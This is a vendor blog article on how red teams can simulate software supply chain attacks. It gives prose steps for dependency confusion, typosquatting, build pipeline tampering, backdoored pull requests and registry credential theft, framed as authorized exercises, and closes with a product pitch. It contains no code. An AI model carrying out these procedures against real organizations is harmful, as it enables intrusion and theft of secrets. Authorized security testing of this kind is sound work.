Offensive Security

Red Team Supply Chain Attack Simulation

How red teams can simulate real-world supply chain attacks to test organizational defenses—from dependency confusion to build pipeline compromise.

Red teams exist to find the gaps that blue teams and automated tools miss. With software supply chain attacks becoming one of the most effective intrusion vectors available to real adversaries, it's past time for red teams to incorporate supply chain attack simulation into their engagements.

This isn't theoretical. The techniques described here mirror what threat actors actually use. The difference is that you're using them in a controlled environment with proper authorization to find weaknesses before someone else does.

Why Red Team Supply Chain Attacks

Traditional red team engagements focus on network penetration, social engineering, and endpoint compromise. These are valuable, but they miss an entire class of attacks that bypass perimeter and endpoint defenses entirely.

A supply chain attack doesn't need to get past your firewall. It arrives as a legitimate software update, a trusted package download, or an approved dependency. It's already inside your trust boundary by the time it executes.

If your red team isn't testing these scenarios, your organization has a significant blind spot in its security validation program.

Pre-Engagement Planning

Supply chain red team exercises require more careful planning than standard engagements. The potential for collateral damage is higher, and the scope needs to be precisely defined.

Rules of Engagement

At minimum, the rules of engagement should address:

Target scope: Which internal packages, registries, and build systems are in scope?
Escalation limits: How far can the red team go in compromising shared infrastructure?
Safe words and rollback: Procedures for immediately stopping the exercise if something goes wrong.
Internal vs. external packages: Is the team authorized to publish packages to public registries (with appropriate safeguards)?
Notification list: Who needs to know about the exercise to prevent incident response teams from wasting time on a drill?

Threat Model Alignment

Base your simulations on realistic threat models. Study recent supply chain attacks—SolarWinds, Codecov, ua-parser-js, event-stream—and model your scenarios on the techniques that actually worked. There's no value in simulating an attack that no real adversary would attempt.

Attack Scenarios

Scenario 1: Dependency Confusion

Objective: Test whether the organization's package resolution is vulnerable to dependency confusion attacks.

Technique: Identify internal package names by analyzing build configurations, error messages, or developer documentation. Register those names on public registries with higher version numbers.

Execution:

Enumerate internal package names through reconnaissance (developer docs, GitHub repos, error messages, job postings that mention internal tools).
Register matching package names on npm, PyPI, or other relevant public registries.
Include benign callback code that phones home to a red team server with environment details.
Wait for build systems to pull the public package instead of the internal one.
Document which systems were compromised and how quickly (or whether) it was detected.

Safety controls: The package should contain only callback/beacon code—no destructive payloads. Use unique identifiers so you can track which systems resolved the package.

Scenario 2: Typosquatting

Objective: Test whether developers or automated systems would install a package with a name similar to a legitimate dependency.

Technique: Publish packages with names that are common misspellings or variations of popular packages used in the organization.

Execution:

Identify the most commonly used packages across the organization's codebases.
Generate plausible typosquats (character transpositions, missing hyphens, pluralization).
Publish packages with beacon code and wait for installations.
Optionally, combine with social engineering by posting "helpful" installation commands with typosquatted names in internal channels.

Scenario 3: Compromised Build Pipeline

Objective: Test the integrity of the CI/CD pipeline against insider threats or compromised credentials.

Technique: Using provided credentials (simulating a compromised developer account), modify build configurations to inject code during the build process.

Execution:

Access the CI/CD system with the provided credentials.
Modify build scripts to include a beacon that activates in the built artifact.
Ensure the modification is subtle—buried in a legitimate-looking configuration change.
Track whether the change passes code review and whether the beacon activates in staging or production.
Document the detection (or non-detection) timeline.

Scenario 4: Malicious Contribution

Objective: Test the code review process for its ability to detect subtle malicious changes submitted as seemingly legitimate contributions.

Technique: Submit pull requests to internal repositories that contain hidden malicious functionality alongside legitimate improvements.

Execution:

Identify an internal open-source project or shared library that accepts contributions.
Submit a pull request that includes a genuine bug fix or feature alongside a subtle backdoor.
The backdoor should be non-obvious—perhaps a logic change that creates a bypass condition under specific inputs, or a dependency addition that seems reasonable but contains a beacon.
Track whether code reviewers catch the malicious component.

Scenario 5: Registry Credential Theft

Objective: Test the security of package registry credentials and tokens.

Technique: Attempt to extract npm tokens, PyPI credentials, or other registry authentication material from build systems, developer workstations, or configuration files.

Execution:

Search CI/CD environment variables for registry tokens.
Scan internal repositories for accidentally committed .npmrc files, pip.conf files, or similar credential stores.
Check developer workstations (if in scope) for cached credentials.
If credentials are obtained, demonstrate impact by publishing a benign test package to the registry.

Post-Exploitation Scenarios

If initial supply chain compromise succeeds, demonstrate the downstream impact:

Lateral movement: Show how a compromised dependency can be used to pivot to other systems.
Data exfiltration: Demonstrate that a malicious dependency could extract secrets, tokens, or source code from the build environment.
Persistence: Show how supply chain access can be maintained across updates and redeployments.

Measuring Success

Supply chain red team exercises should measure:

Detection rate: How many of the simulated attacks were detected by existing security controls?
Detection time: How long between the attack and its detection?
Response effectiveness: Once detected, how quickly and completely was the attack remediated?
Scope of impact: How many systems or environments were affected before detection?
Process gaps: Which policies or procedures failed to prevent the attack?

Reporting and Remediation

Red team findings should be specific and actionable. For each successful attack scenario, the report should include:

The exact technique used and why it succeeded
Which controls should have detected or prevented the attack
Specific, prioritized recommendations for remediation
Evidence of impact (beacon callbacks, screenshots, compromised artifacts)
Recommendations for ongoing detection capabilities

Building Internal Capability

Not every organization can hire an external red team for supply chain exercises. Building internal capability requires:

Training existing red team members on software supply chain concepts
Investing in tooling for package analysis, registry monitoring, and build system testing
Maintaining an updated library of attack techniques based on real-world incidents
Running exercises regularly enough to validate that remediation efforts are working

How Safeguard.sh Helps

Safeguard.sh strengthens the blue team side of supply chain red team exercises. The platform provides continuous dependency monitoring, SBOM analysis, and vulnerability correlation that serve as the detection layer red teams are testing against. Organizations can measure their detection improvements after each exercise by tracking how quickly Safeguard.sh surfaces the indicators of simulated attacks—new dependencies, unexpected package sources, and anomalous changes in the dependency tree.

red team attack simulation supply chain penetration testing offensive security

Back to all articles